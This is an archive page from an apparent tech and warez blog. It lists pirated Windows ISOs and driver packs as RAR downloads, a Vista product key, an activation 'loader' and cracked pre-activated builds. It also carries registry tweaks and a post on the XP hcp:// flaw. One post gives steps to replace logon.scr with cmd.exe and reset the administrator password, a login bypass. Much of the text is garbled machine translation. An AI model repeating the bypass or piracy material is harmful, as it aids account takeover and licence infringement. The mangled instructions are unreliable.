Showing posts with label window. Show all posts
Showing posts with label window. Show all posts

Thursday, May 5, 2011

Driver Packs for All Windows (2011/ENG)

Driver Packs for All Windows (2011/ENG)

Driver Packs for All Windows (2011/ENG)

Driver Packs BASE Driver Packs for All Windows (2011/ENG)
Size: 2.30GB

This release offers drayverpaki for all types of Windows operating systems and software for integrating them into the distribution.

Year: 2011
Version: 11.1
Developer: Driverpacks Group
Platform: Windows 2000 / XP / 2003 / Vista / 7
Language: English Russian
Crack: not required
Size: 2.30GB (1.04 GB / 629.91 MB / 663.85 MB)

System requirements: Installed on a computer running Windows 2000 / XP / 2003 / Vista / 7

Ext. Information:
- Not necessarily those drayverpaki integrate into the distribution windows.
- You can bet these drivers manually after installing windows.
1) in the properties of the device you want to install the driver in the line "device instance ID" search text DEV_ **** (instead of 4 stars - 4 digits or letters).
2) looking for (eg searching in total commander) contents drayverpakov files *. inf text DEV_ **** (instead of 4 stars - your 4 numbers or letters).
3) the search result will show you which folder / folders likely to lie right driver for this device.
If the line "device instance ID" no text DEV_ ****, you can search on what else the text of this row.
if not, you can intuitively poperebirat several putatively necessary folders, folder names that begin with the same letter, which begins the name of the manufacturer the device.
information about the devices may for example give the program hwinfo32.
In my opinion it is more convenient to store these drayverpaki on a flash drive as a ZIP or RAR archives as well as Total Commanderie can search inside ZIP and RAR, and 7Z inside there.

Windows 2000-xp-2003 (x86) driverpacks

DP Bluetooth wnt5 x86-32910 (new)
DP Chipset wnt5 x86-32 1011
DP CPU wnt5 x86-32 1005
DP Graphics A wnt5 x86-32 1011
DP Graphics B wnt5 x86-32 10111
DP Graphics C wnt5 x86-32 1011
DP Graphics Languages wnt5 x86-32 10111
DP Graphics PhysX wnt5 x86-32 1011
DP HID wnt5 x86-32 in 1101 (new)
DP LAN wnt5 x86-32 10111
DP MassStorage wnt5 x86-32 1011
DP Misc wnt5 x86-32 in 1011 (new)
DP Modem wnt5 x86-32 in 1101 (new)
DP Monitor wnt5 x86-32 in 1005 (new)
DP Runtimes wnt5 x86-32 1011
DP Sound A wnt5 x86-32 1009
DP Sound B wnt5 x86-32 1009
DP WebCam wnt5 x86-32 in 1101 (new)
DP WLAN wnt5 x86-32 1009
Windows vista-7 (x86) driverpacks
DP Audio wnt6-x86 1007
DP CableModem wnt6-x86 1001
DP CardReaders wnt6-x86 1001
DP Chipset wnt6-x86 1011
DP Gaming wnt6-x86 1001
DP Graphics A wnt6-x86 1007
DP Graphics B wnt6-x86 1007
DP Graphics Mobile wnt6-x86 1007
DP LAN wnt6-x86 1003
DP MassStorage wnt6-x86 1011
DP Modem wnt6-x86 1001
DP Monitors wnt6-x86 1001
DP Touchpad Mouse wnt6-x86 1003
DP TVcard wnt6-x86 1001
DP Webcam wnt6-x86 1001
DP WLAN wnt6-x86 10071

Windows vista-7 (x64) driverpacks
Cardreaders x64 911
DP Audio wnt6-x64 1007
DP Chipset wnt6-x64 1011
DP Graphics A wnt6-x64 1007
DP Graphics B wnt6-x64 1007
DP Graphics Mobile wnt6-x64 1007
DP LAN wnt6-x64 1003
DP MassStorage wnt6-x64 1011
DP Touchpad Mouse wnt6-x64 1003
DP WLAN wnt6-x64 10071
Gaming x64 812
Misc x64 911
Monitors x64 911
DOWNLOAD pack all win.snekyy.part01.rar pack all win.snekyy.part02.rar pack all win.snekyy.part03.rar pack all win.snekyy.part04.rar pack all win.snekyy.part05.rar pack all win.snekyy.part06.rar pack all win.snekyy.part07.rar pack all win.snekyy.part08.rar pack all win.snekyy.part09.rar pack all win.snekyy.part10.rar pack all win.snekyy.part01.rar pack all win.snekyy.part02.rar pack all win.snekyy.part03.rar pack all win.snekyy.part04.rar pack all win.snekyy.part05.rar pack all win.snekyy.part06.rar pack all win.snekyy.part07.rar pack all win.snekyy.part08.rar pack all win.snekyy.part09.rar pack all win.snekyy.part10.rar

Monday, May 2, 2011

Microsoft Windows Vista AIO RTM

Microsoft Windows Vista AIO RTM

Microsoft Windows Vista AIO RTM ENG (WIN32/WIN64) DVD/ISO 2011 | 4.42 GB
Windows Vista, the next generation OS from Microsoft is now RTM.
This DVD includes both the 32Bit and 64Bit versions of Vista on 1
DVD. It is bootable into either the 32Bit or 64Bit setup and will
allow you to install any of the versions of Vista listed below:
Windows Vista Home Basic (x86) or (x64)
Windows Vista Home Basic N (x86) or (x64)
Windows Vista Home Premium (x86) or (x64)
Windows Vista Business (x86) or (x64)
Windows Vista Business N (x86) or (x64)
Windows Vista Ultimate (x86) or (x64)
Windows Vista Starter (x86)
You can also install Vista from another Windows via the autorun.
However please note that you cannot install/start the x64 Vista
setup from a 32bit/x86 Windows install, you must start it from an
x64 install of Windows.
OEM/Retail versions are all available on the DVD depending on the
type of key you enter.
Similar to our previous releases of Vista during the beta,
we are providing 1 key that will install Vista. In this case, the
key is an RTM universal key and will allow you to choose whichever
version of Vista you wish to install. The key will however not
activate Vista. The same key is also builtin to every Vista ISO by
MS for trial/quick install purposes.
For further info, see \sources\x86\sources\inf\setup.cfg on the ISO.
Therefore, that means you can also choose to install Vista without
a key by selecting Next during the cd-key prompt during Setup
without entering a key, then pressing No for the popup window. It
will make no difference to activation however and you will still
have a limited period of time to use it.
Since Windows XP, Microsoft has instituted Windows Product
Activation (WPA). This prevents any extended full usage of the
Product beyond the allotted time, determined at install. We are NOT
providing workarounds or ‘fixes’ for WPA. You are still required to
activate your software within this time. While we are aware of
possible workarounds in the wild that may work with Windows Vista,
we suggest keeping yourself out of trouble. Most release groups
will tell you, “if you like it buy it,” we say the same.
Note: When selecting the version of Vista to install during Setup,
you must select the type that corresponds to the architecture
you selected prior to the start of Setup. (ie. if you choose
the x64 Setup, you must select an x64 version from the list
of Vistas to install.)
The build number for those interested is: 6000.16386.061101-2205
Nukers-This must remain an ISO or it will not extract or boot.
.Burn to dvd or mount with an emulator
.Install, key is: YFKBB-PQJJV-G996G-VWGXY-2V3X8 (Universal Key)
OR Leave the cd-key field blank and install
without a key.


Saturday, April 30, 2011

Windows 8 Build 7955 Milestone 2 x86-iND

Windows 8 Build 7955 Milestone 2 x86-iND

Windows 8 Build 7955 Milestone 2 x86-iND
Size: 2.47 GB


Size: 2.47GB (2,657,079,296 bytes)
MD5: 40861A02CB14B0D2D7930910DB6CC6E4

1. Burn/mount/install.

2. Enjoy!

Sunday, March 20, 2011

Windows 8 (2011) Ultimate Xtreme Edition (32/64-Bit) Integrated

Windows 8 [2010] Ultimate Xtreme Edition (32/64-Bit) Integra
Windows 8 [2010] Ultimate Xtreme Edition (32/64-Bit) Integra
Size :
2.3 GB

Windows 8 xTreme its a System based on Windows 7 Final :
- Windows 8 xTreme doesn't have any components removed from Original Windows 7 Image so you wont lose any compatibly withsoftware, hardware or miss any stuff at all.
- Windows 8 xTreme its a Clean Windows 7 Image with a compilation of the best tweaks and a new integrated look ... keeping

Windows 8 [2010] Ultimate Xtreme Edition (32/64-Bit) Integra

Windows 8 [2010] Ultimate Xtreme Edition (32/64-Bit) Integra

Download :[x64]_ _[x86].part01.rar[x64]_ _[x86].part02.rar[x64]_ _[x86].part03.rar[x64]_ _[x86].part04.rar[x64]_ _[x86].part05.rar[x64]_ _[x86].part06.rar[x64]_ _[x86].part07.rar[x64]_ _[x86].part08.rar[x64]_ _[x86].part09.rar[x64]_ _[x86].part10.rar[x64]_ _[x86].part11.rar[x64]_ _[x86].part12.rar

Thursday, March 17, 2011

Windows 7 SP1 32 Bit & 64 Bit Genuine with Guide To Install

Windows 7 SP1 32&64 Genuine with Guide To Install by

Windows 7 SP1 32&64 Genuine with Guide To Install l 4.45 GB
Microsoft released the first official service pack for Windows 7 on February 22, 2011. This is an important update that includes previously released security, performance, and stability updates for Windows 7. SP1 also includes new improvements to features and services in Windows 7, such as improved reliability when connecting to HDMI audio devices, printing using the XPS Viewer, and restoring previous folders in Windows Explorer after restarting.


Thursday, March 10, 2011

Konsep Terbaru Yang Akan Di Pasang Di Windows 8

Konsep Terbaru Yang Akan Di Pasang Di Windows 8 by
Umur Microsoft sudah puluhan tahun merajai dunia teknologi yang khususnya mendalami dalam dunia system operating yang banyak dikenal dengan julukan windows. beberapa tahun yang lalu pihak microsoft sudah meluncurkan sebuah sistem operasi baru yaitu windows 7 (windows seven), namun dengan perkembangan dan banyak saingan microsoft tak mau kalah dengan perusahaan - perusahaan besar yang mengembangkan sistem operasi juga contohnya seperti mac OS. bahkan bersaing dengan sistem operasi open source.

Sekarang ini yang menjadi perbincangannya yaitu sistem operasi yang sangat dominan sekali yaitu menurut rumornya bahwa pihak microsoft akan meluncurkan sistem operasi lagi yang dari perkembangan sistem operasi Windows 7 yaitu Windows 8. kini microsoft tampaknya ingin cepat - cepat rilis Windows 8 agak kita terkesiap dengan konsep - konsep baru yang akan dipaketkan bersama Windows 8 nantinya.

Bahkan kini sudah bocor beberapa gambar dari Win7China, yang mengulas mengenai konsep-konsep awal dari sistem operasi penerus Windows 7 itu. Kini pihak Microsoft sendiri baru memasuki riset tahap ketiga. Dari gambar yang ada bisa dilihat bahwa adanya perubahan besar pada Taskbar, instalasi driver dan juga integrasi komputasi awan.

Konsep Terbaru Yang Akan Di Pasang Di Windows 8 by

Secara keseluruhan memang konsep awal Windows 8 ini masih mengadopsi konsep dari pendahulunya. Beberapa perbedaan yang bisa dilihat antara Windows 7 dan Windows 8 yaitu salah satunya pada kemunculan notifikasi ketika menginstalasi driver. Pada Windows 7, pengguna hanya menerima notifikasi bahwa driver sedang diinstal secara otomatis. Sedangkan nantinya di Windows 8, pengguna akan tau mengenai seberapa jauh proses yang sedang dijalankan sampai proses itu selesai, Anda akan dapat mengetahuinya dengan mudah.

Konsep Terbaru Yang Akan Di Pasang Di Windows 8 by

Konsep Terbaru Yang Akan Di Pasang Di Windows 8 by
Generasi penerus Windows 7 ini kabarnya pula akan lebih diakrabkan dengan Windows Live. Dimana pengguna Windows 8 akan mudah terhubung dengan akunnya di WIndows 8. Selain itu dari gambar konsep, kita bisa melihat ada perubahan elemen baru yang ditambahkan di bagian Taskbar, ada pula pilihan representasi visual sistem operasi. Diperkirakan nantinya pihak Microsoft akan mulai memasuki tahap Beta pada akhir tahun 2011 ini. Nah, kita tunggu saja ya perkembangannya.

Thursday, February 24, 2011

Download Windows Essentials Codec Pack 3.3

Download Windows Essentials Codec Pack 3.3 by
Windows Essentials Codec Pack 3.3 | 18:12 MB

With Windows Essentials Codec Pack you Should Be Able to play 99% of all movies and music files That you download off the Internet, stay up to date with the latest Codecs with the Audio / Video Codec Update Service, and eliminate the many conflicts and error  the caused by using multiple codecs to decode the Same file type

Download Windows Essentials Codec Pack 3.3 by

Tuesday, February 15, 2011

Windows Xp Complete Pure (2011)

Windows Xp Complete Pure (2011) by

Xp Professional Sp3 OEM Version based on the basis of Xp Professional Sp3 Genuine OEM and enabled
Release the last updates until 20 December and the serial ROM with the original - do not need to admit him
Not remove anything from the components of version - so it has the stability of fully and safely beyond the borders
Digital Clear Bad sectors SATA version supports full support and suitable for all devices - including mobile and desktop
Release only consume 2 GB of hard and less than 90 MB of Alramat - Enjoy unlimited speeds

All Microsoft Windows hotfixes and Security Update Untill Dec 2010
  Windows Media Player 11 With latest Updates Windows Media Player 11 With latest Updates
  Internet Explorer 8 With Updates Download Internet Explorer 8 With Latest Updates
  DirectX for Windows XP SP3 Update Dec 2010 DirectX for Windows XP SP3 Update Dec 2010
  Full Support All Sata and Raid Drivers Full Support All Sata and Raid Drivers
  All Microsoft NET Frameworkfrom 1.1 untill 2 with latest updates Frameworkfrom All Microsoft NET 1.1 untill 2 with latest updates
  Adobe Flash Player with Adobe Flash Player latest updates with latest updates
  With MSXML 4.0 SP3 MSXML 4.0 SP3 latest Updates With latest Updates
  & Microsoft Windows Update Microsoft Windows Update &
  Malicious Software Removal Tool Malicious Software Removal Tool v3.8 v3.8
  Windows Genuine Advantage Validation Windows Genuine Advantage Validation
  AIO Cursors Pack AIO Cursors Pack
  New CPL for Control Panel Control panel for New CPL
  With latest Silverlight Silverlight With latest Updates Updates
  All Microsoft Visual C runtimes Untill Dec 2010 All the Microsoft Visual C runtimes Untill Dec 2010

Windows Xp Complete Pure (2011) by
Windows Xp Complete Pure (2011) by
Windows Xp Complete Pure (2011) by

Windows Xp Complete Pure (2011) by 

Monday, February 14, 2011

Windows 7 SP1 Release Date February 22, 2011

Windows 7 SP1 Release Date February 22, 2011 by

blogspot WASHINGTON - Microsoft today (13 / 2) announced that Windows 7 Service Pack 1 (SP1) will soon be available for PC users on 22 February.

Windows 7 Service Pack 1 is said to bring some development of the OS Windows 7.  Similarly, as quoted from PC Authority, Sunday (13/02/2011).

Windows 7 SP1 contains several updates from Windows 7 which was launched on 22 July 2009.  SP1 has a display face better and better speed.

SP1 adds several changes to its beta version, which has been there since July 2010.  Its growth has included fixes for problems keamanana, networking and mobility for general users and the IT professional.

Windows 7 Service Pack 1 size of 1.2 GB.  Meanwhile, for the Windows Volume Licensing program customers will be able to download the Windows 7 SP1 on 16 February.

Source : OkeZone

Monday, January 10, 2011

Free Download Windows Sysinternals Suite 2010

Free Download Windows Sysinternals Suite 2010 by

Been a long time I really missed not sharing a piece of software, but on this occasion I say thank you very much for friends who have supported me in the development of this site.  I take this opportunity to share a untility software that may be urgently needed by all people, especially the users of windows.

a large set of useful system tools from Mark Russinovich.  Sysinternals Troubleshooting Utilities are collected in a single set of tools that contains the individual troubleshooting tools and help files.  Sysinternals utilities help as it professionals and developers manage, troubleshoot and diagnose application and Windows operating systems.

Free Download Windows Sysinternals Suite 2010 by

Wednesday, October 20, 2010

Windows 7 BlackShine 2010 ACTIVATED

Windows 7 BlackShine 2010 ACTIVATED By Alexa-com Weblog
Windows 7 BlackShine 2010.4 - build on Windows 7 Ultimate x86 integrirvanymi with all the latest updates through April 2010, with a changed style of design - Replaced all the system icons and background images have been removed and Replaced with alternatives. Also there have been installed only the most needed programs and gadgets. Installing Windows 7 BlackShine performed in a semi-automatic mode. Building distinguished by a special speed and stability.

System requirements

Processor: 1 Ggz x86/x64
RAM: 512 MB or above
Disk space: 10 GB
VIDEO: DirectX 9 graphics and 128 MB of memory
(For the Aero theme)

Developer: Microsoft/a9lex3
Year: 2010
Enabling | reg code: Present
Interface Language: ENG / RUS
File format:. Iso
Platform / OS: x86/Win7
Size: 3.98 Gb


• Installation is carried out in a semi-automatic mode
(Left open to enter your data, select and format the partition).
• Integrated the latest updates from Windows Update.
• Distribution patched for use of third-party themes.
• Remove all editions except Ultimate.
• Remove all the standard themes Besides "Windows 7". Added alternative topics.
• Remove background images. Added alternative.
• The name "Max" was changed to "Ultimate".
• Fixed a transparent band in the start menu.
• change the system icons.
• Changed the background set and the login screen.
• Added A Few gadgets.
• Apply utility tviki.

Installed Programs

Adobe AIR
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
Adobe Shockwave Player 11.5
Auslogics Disk Defrag
EVEREST Ultimate Edition Update Checker
Filezilla Client
GOM Player
Google Chrome
K-Lite Mega Codec Pack
Microsoft Office Ultimate 2007
Microsoft Silverlight
Microsoft Visual C 2005 Redistributable
Mozilla Firefox
Nero 9 Lite
Orbit Downloader
Picasa 3
Restorator 2007
SiSoftware Sandra Pro Business 2010c
The KMPlayer
TuneUp Utilities 2010
UltraISO Premium
VirusTotal Uploader

Windows 7 BlackShine 2010 ACTIVATED By Alexa-com Weblog

Windows 7 BlackShine 2010 ACTIVATED By Alexa-com Weblog

Windows 7 BlackShine 2010 ACTIVATED By Alexa-com Weblog

Windows 7 BlackShine 2010 ACTIVATED By Alexa-com Weblog

Windows 7 BlackShine 2010 ACTIVATED By Alexa-com Weblog

For Activation
Windows 7 Loader v1.9.2
Windows 7 BlackShine 2010 ACTIVATED By Alexa-com Weblog

Saturday, August 7, 2010

Using Face We To Log Into Windows Computers

Did you ever think if you want to log into your computer or laptop using your face from the typing? and from there well before using fingerprints, but this time using your own face. if you want it like that you can use the system you are using by using free software, the software is Luxand Blink. if you use this software, you can login to the computer / laptop you will see just windows laptop / computer you have.

Software features are:

  • Login to Computer / laptop just by looking at it.

  • Under varying conditions Handalkan your login.

  • Hair Cuts Changed? Contacts Glasses to swap? No problems whatsoever!.

  • Increased Security.

  • Identity Thieves Catch.

Smooth installation same as other windows applications. This web cam is detected quite easily to my laptop and asked for permission to use it. After that you need to let it recognize your face while sitting in front of the camera and your face is moving from left to right so that it can recognize and save it for later logins.

The choices are quite simple and quite clear. Now when you reach the login screen, the camera automatically and started trying to identify a face to login. The developers say it works quite well in various conditions of work.

How to Use :

I need some time to recognize my face the first time. Thats OK because the need to create a database of faces from almost any angle. Also, it leaves your login password because usually that means you can login with your password, even if installed face recognition. That's bad in terms of security, but good in situations when you cannot login using your face happens to me too.
When I try to log in testing, sadly not a lot of good performance. You can call it bad as possible. I can log in only once out dari 10th time I tried meskipun I'm sitting in the same place in which the first face recognition were conducted using good lighting semua dengan alasan around.The, mungkin masih are not intended for almost all types of ras in the world or still needs to be improved a lot.

So I would advice, do not use it until you get proper lighting right in your face. You cannot use it to log in a variety of conditions around you.

Note : This software is recommended for a laptop or computer that has windows vista operating system and window seven (win 7) for computers that have windows xp operating system I have never tried, probably could not walk properly.

For those of you who want to download please click the link below :

Download :

Enhanced by Zemanta

Monday, July 12, 2010

change logon screen windows 7

On this occasion I am very Grateful to Be Able to enjoy the freshness of this nature and Can Provide a very useful article for you. In this article I Will discuss about Windows 7 (Windows Seven).

with seven out of the window (windows 7) lots of people WHO want to find or change the appearance of window 7 Itself as in Windows XP.

Logon Screen Windows 7
'there is now a Software That Can change the logon screen background on windows 7. but this software specifically for Windows operating systems only for the other seven series There Will Be but I do not Provide Them. oh, I forgot to tell you the name of the software, the software is named logon SCREEN Itself.

at the logon screen software is already integrated with the context menu in Windows 7. Can you change the software with the logon screen logon screen windows 7 at your background you will. without being blocked. I hope this article Can be useful for you.

oh, I forgot to Mention the download link, hehehehehe. For Those of you WHO want the logon screen software Can you get it through this link, please click here.

Saturday, July 10, 2010

Windows XP Back so this year targeted by hacker

the opportunity this time I am eager to share information Which is very useful for you all. That information comes from my windows xp so far but now it will from Disappear reappear. Disappear somehow or maybe it was the cause of launchingnya Windows 7 (Windows Seven). Microsoft has said more than 10.000 self-made machine microsoft has been attacked by hackers and crackers are caused by bugs That Are Owned oelh Windows XP, and will of continue to fall victim to the next. but so far no official patch from Microsoft. wow, this is terrible news. This deadly attack is very capable of making the intruder / attacker / cracker, cans call this person and have full control or the controls on your pc or computer attack.

Microsoft Window XP has allowed access to Help Document (Microsoft Help Center) through a URL using  protocol: hcp:// refrensi like at this URL:  .
and to note That Can everyone use a CMD or Command Prompt, you are already biased running calculator calculator just by typing in the Command Prompt.

Windows XP Hacking
Exciting is not it? And of course, what if there is a third type of program, thirdy follow-up party chipped to randomize the system. As written by Tavis Ormandy in his article in
There are so many possibilities that occur by using an iframe and insert Hcp protocol like this:
<iframe src="hcp://...">

Sunday, February 14, 2010

change icon with an Autorun.inf Drive alone

good now talk about what? wow, how about talking about the settings in the registry again just compatriots with hacking Little, hehehhe. You've seen no icon Drive CD-ROM that can be changed when you insert a CD? well, if I had show and try this tip and trick, but it did not work. hehehehehe, well I was the same lie again you all, who really is the answer that the tip and trick it worked 100% just tried on my computer, using windows OS. you want to know something? I love ya have a tip and trick I told you. follow it? steps - the steps below:

The first thing you should do is open your notepad and then you write the same script as the script below, but you can copy and paste the script.

icon = name icon.ico

then you save with the autorun.inf name, you do not have to be afraid anymore with this script is not harmful and will not be a virus, because many people say that autorun malicious viruses, but in my opinion the most exciting program really, hehehehhe. if you are already in the store immediately place the program or script that had been stored in the root drive that you want or go or CT: C: \\ or D: \\. then you put the file icon that you want in the same place with the autorun.inf file, then you do not forget to restart your computer first, because most people keep forgetting that, like me hehehe. why should the restart because the file is not running so it should be on the first restart, so's all you report it, hehehehe.

you make a note: This tip and trick you can practice for the hard disk icon change also, and to view the files on the drive does not look a mess I suggest original all the files you change its attributes seem to be hidden all of ya.

hopefully useful tips and tricks this time, tips and tricks are very simple.

Wednesday, January 27, 2010

User passwords restore the window from the beginning

on before posting this time, this site has provided tips and tricks for telling you about regedit even a lot of things - things that maybe you are not familiar with regedit. if you have experienced loss in the window user password?

maybe if your computer is in use by some users sometimes there are several user accounts with different account in a different operating system. example: administrator, Limited, and even just simply Guest. if at any point you really need one to use or change something in an operating system that you need to access the operating system using a user account with administrator or user administrator rights.

if you still remember the password you use may not be any problem but if you forget the password. This one follows a very telling way of all. sometimes it this way in all PCs berhasi will but who knows in the PC you use was not successful. the following steps:

1. Turn on your computer in Safe Mode.
2. After arriving in the user menu, select a user that is not password protected or that you remember the password.
3. After entry into the operating system, click [start]\u003e [Run] and click "CMD" and press Enter.
4. After the command prompt window open, click "C: \\ WINDOWS \\ System32" (without the "), your operating system is installed on drive C: \\ and name of the folder where Installing a 'Windows'.
5. For safety, before changing the administrator password, there is a good idea to make backups of the files with the name logon.scr. The trick is to click the "Copy logon.scr logon.bak" (without the ").
6. Next is click the command "copy cmd.exe logon.scr".
7. To change the administrator password, the dir c: \\ windows \\ system32 earlier, click command: "net user administrator 1234". with the example, the administrator user's password will be changed to 1234. Surely the new password you can change at will. In addition you can also change the password other registered users.
8. After that the screen will display the password change was successfully performed. If you've restarted your computer and try to login with the user password has changed.

The steps above is one way to change password administrator or other users in the Windows XP operating system. If you do not succeed to open the windows XP administrator's password with the steps above, there is one other shortcuts that you can do.

The way is to reset the administrator password to be empty, so we login with the administrator account without having to enter his password.

To do this, you need a tool called CHNTWP (Change NT Password), utilities may CHNTWP taken in address and you can use as a waste Besides can reset the password of each user which operating system is Windows NT-based, you also do not need to remember long-reminders password of each user.

Saturday, January 2, 2010

20 hacking the registry to improve computer performance

Right-click function is a very good way to learn some of the hidden functions of Windows. Want more? Try you start exploring the Control Panel application and find some useful techniques. And there's more command-line application in the folder Windows' System32. But, none could compare to the Registry.

Registry complete with various useful settings to improve performance, improve security holes, and even change the fundamental basis of Windows to work better. Although very sophisticated look, you still need to be careful in using it because it is not just a feature that helps but also many pitfalls.

If not careful, you are actually adding to the problem of solving it. For that, below there are 20 hacks for you to try to make your PC better. Good luck!!

1. Increase Security
Someone who does not want can easily take your data with the USB if he managed to access your PC physically. If you're using Windows XP2 or later, there is a simple way to prevent it.

Navigate to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ StorageDevi cePolicies", create a DWORD value called "WriteProtect" and set the value "1". You will be able to read the USB drive, but can not move the data into it again.

2. Control UAC
Full Vista's User Account so often led to warnings that eventually turned off by the user. But, sometimes it makes them miss features that are useful as protection mode for IE. You can control it how to disable the warning for the administrator, so you do not need to interfere, but the UAC still working on the background and you can still get its features.

To do this, go to "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ System \\ ConsentPromptBehaviorAdmin", and set the value to "0". To return to normal conditions, set the value to "2".

3. Change Owner

Install Windows on your PC and you'll be prompted to enter a name, which will then be stored as the registered owner (WinVer run to see this on your system). If you buy a secondhand computer, you may want to change the name of the owner with his own name.  there's no other way than with the Registry.
br\u003e Go to the "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVers ion" and will see two sentences "RegisteredOwner" and "RegisteredOrganization". Double-click on them to change.

4. Sort the files by True
Sort the file name in Explorer can become a problem. Initial settings, he would put "File_v2.txt" before "File_v15.txt", and sequences that are not ASCII, but it looks more reasonable. But, what if "v" refers to the version number, and should "File_v15.txt" in the previous order? At this time, initial system Explorer can not work at all.

To return the ASCII sort order based on the usual, go to "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ Explorer", create a DWORD value called "NoStrCmpLogical" and set the value to "1". Delete the code if you want to go back to the initial conditions of the standard Explorer.

5. Troubleshoot Startup
If Windows takes too long to start up and shut down, he probably was having an issue. To find out what was happening back in "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ System", create a DWORD value called "verbosestatus" and set the value to "1". Restart your PC and Windows will tell you what is happening.

6. Organize Folder Types
Vista's explorer will intelligently choose the type of folder you based on its contents. However, this means your download folder will turn into the music folder if you downloaded some MP3. To fix this, go into the "HCU \\ Software \\ Classes \\ LocalSettings \\ Software \\ Micro soft \\ Windows \\ Shelf", delete the subkey "Bags" and create new ones at the same location.

Make a key called "AllFolders" under Bags, and other key named "Shell" at the bottom again. Then click her to open the "HCU \\ Software \\ Classes \\ LocalSettings \\ Software \\ Micro soft \\ Windows \\ Shell \\ Bags \\ AllFolders \\ Shell". Right-click on the right panel, select 'New | String Value "and call it" FolderType ". Then, double click on FolderType and set the value to "NotSpecified". You still can change the type of folder, but Vista will not change automatically. (If you need assistance, please click here)

7. Encryption Easily
Some versions of Windows allows you to encrypt files, although the process is a bit strange. You must right-click on the file, select "Properties", press the button "Advanced, check" Encrypt contents to secure data ", and press" OK "as much as 2x.

For a more simple way, go to "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ Current \\ Version \\ E Xplorer \\ Advanced" create a DWORD called "EncryptionContextMenu" and set the value to "1". Now you simply right-click on the file and select "Encrypt".

8. Fast Folder Access
Quick access to folders bring it on the Start Menu, type "REGEDIT" in the "Run", go to "HKCR \\ Folder \\ shellex \\ ContextMenuHandlers", right-click "ContextMenuHandlers" and click "New | Key".

Type "and press [Enter]. Now, hold [Shift], right-click on a folder, and select" Pin to Start Menu ".

9. Accelerate Time copy
Vista gives a high priority for your soundcard, so you need to get a free audio of the problem no matter what your PC is a process. Because it can slow the process of copying the network.

To fix this, go to "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Multimedia \\ SystemProfile". Try to set the "NetworkThrottlingIndex" became more 10 to 50 or 60 is quite effective, then reboot and test your network speed. For more information, click here.

10. Fix Listing Drive
If Explorer no longer displays your DVD drive, go to "HKLM \\ System \\ CurrentControlSet \\ Control \\ Class \\" and delete settings "UpperFilters" or "LowerFilters". These tips usually works, but sometimes can fail if the relevant application was problematic from the beginning. If the program stops working, see if there are updates, then reinstall.

11. Access to the Fast Display Settings
Just right-click on the desktop of Windows Vista is not enough to take you directly to the display settings menu. Windows 7 was prepared to fix this. But, for now you can do so by going to "HKCR \\ Directory \\ Background \\ Shell", right-click "Shell", select "New | Key" and called the "Display Settings".

Double-click "(Default)" there the right panel and enter the "Display Settings" in the Value Data box. Now, right-click "Display Settings" on the left panel, select "New | Key" again, and call this function as "command".

Double-click the Default value of new functions and enter the following text: "rundll32 shell32.dll, Control_RunDLL DESK.CPL, @ 0.3". Click "OK" and right-click on the desktop to see the option to display the new settings.

12. Live Messenger Multiple Log-In
Normally, Windows Live Messenger (WLM) only allows you to enter into only one account at a particular time. To make more than one, go to "HKLM \\ Software \\ Microsoft \\ WindowsLive \\ Messenger", create a DWORD value named "Multiple Instances" and set the value to "1". To restore to its original state, simply delete the value.

13. Clear Menu-Menu
You have to uninstall an application, but instead he left you a gift in the form of icons that are not useful. To fix this, go to "HKCR \\ *" and "HKCR \\ Directory". Dilate his panel, then select "shellex \\ ContextMenuHandlers" and see the various buttons on the bottom, which relate to orders you do not want.

On the PC, the function "HKCR \\ * \\ shellex \\ ContextMenuHandlers \\ 7-Zip" context menu related with 7-Zip, for example, to delete, click the "Delete" on the left panel. But be careful, you should delete only if it is 100% sure on the right menu.
14. Accelerate Back-Up
Features of Windows XP NTCBACKUP improve performance by maintaining a list of system files if he knows you will not be possible to make a back-up. Add the files and folders that you want yourself and get better results again.

See the list at "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ BackupResto re \\ FileNotToBackup".

15. Change the Default Installation Folder
Most of the default installation is a Program Files folder, but if you want to change it, go to "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersio n", change "ProgramFilesDir" into the folder and reboot your choice

16. Changing Drive Name
Adding a memory card reader and the Explorer will often stop the computer folders that have names similar drives. ( "Removable Drive D:", "Removable Drive E:", and so on), making it difficult to distinguish.

You can handle the "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Ex plorer". Make a button with the letter of the drive (for example "G"), and inside it create another new key named "DefaultLabel". Double-click on the entered value, give the name "CompactFlash" (or whatever you want it), and click "OK". Restart Explorer or press [F5] and see the changes. Drive G: will be read as "CompactFlash (G".

17. Wipe the Page File
Windows stores memory pages on the paging file for your work. It all sounds good, until someone managed to access your system, find the files, and even add or reduce something you do not want.

To fix this, go to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ SessionMana ger \\ MemoryManagement", set the value "ClearPageFileAtShutdown" to 1 and reboot. Windows will delete all files on the page when it is turned off. It extends the duration and processes, but improve safety.

18. Crash on Cue
Blue screen crash usually bring bad news, but sometimes you may want to bring it up to test the Windows error reporting for example. Apparently Registry tricks can help you even for this one thing.

Navigate to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Services \\ i8042prt \\ P arameters", create a DWORD called "CrashOnCtrlScroll" and set the value to 1. Reboot your computer, and crashes to just hold [Ctrl] right and press [Scroll Lock] twice. When finished, make sure that you immediately remove these commands.

19. Save CPU Time
A standard PC usually has several programs that want to use processor capacity at the same time, and Windows will allocate each period of CPU time a "quantum" a move to the next program. By default, this is usually very short, so the PC will be responsive, but sometimes this means that Windows will make the time to move between these processes.

The solution? You can try what Windows Server do. Set the system to use a longer quantem. Set "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ PriorityCon Control \\ Win32PrioritySepartion" to 16 (hex).

Quantum older means less turnover among the programs so much less time is wasted. You may notice that lag in games or video playback will be more subtle. But, if you find other problems, simply return the value to be Win32PrioritySeparation original value of 26.

20. Disable Autorun
Autorun feature of Windows is one of the potential security risk because it runs the code automatically when you connect a removable device that is in the PC. If indeed, it can be manually set it, it would be safe to turn off the feature.

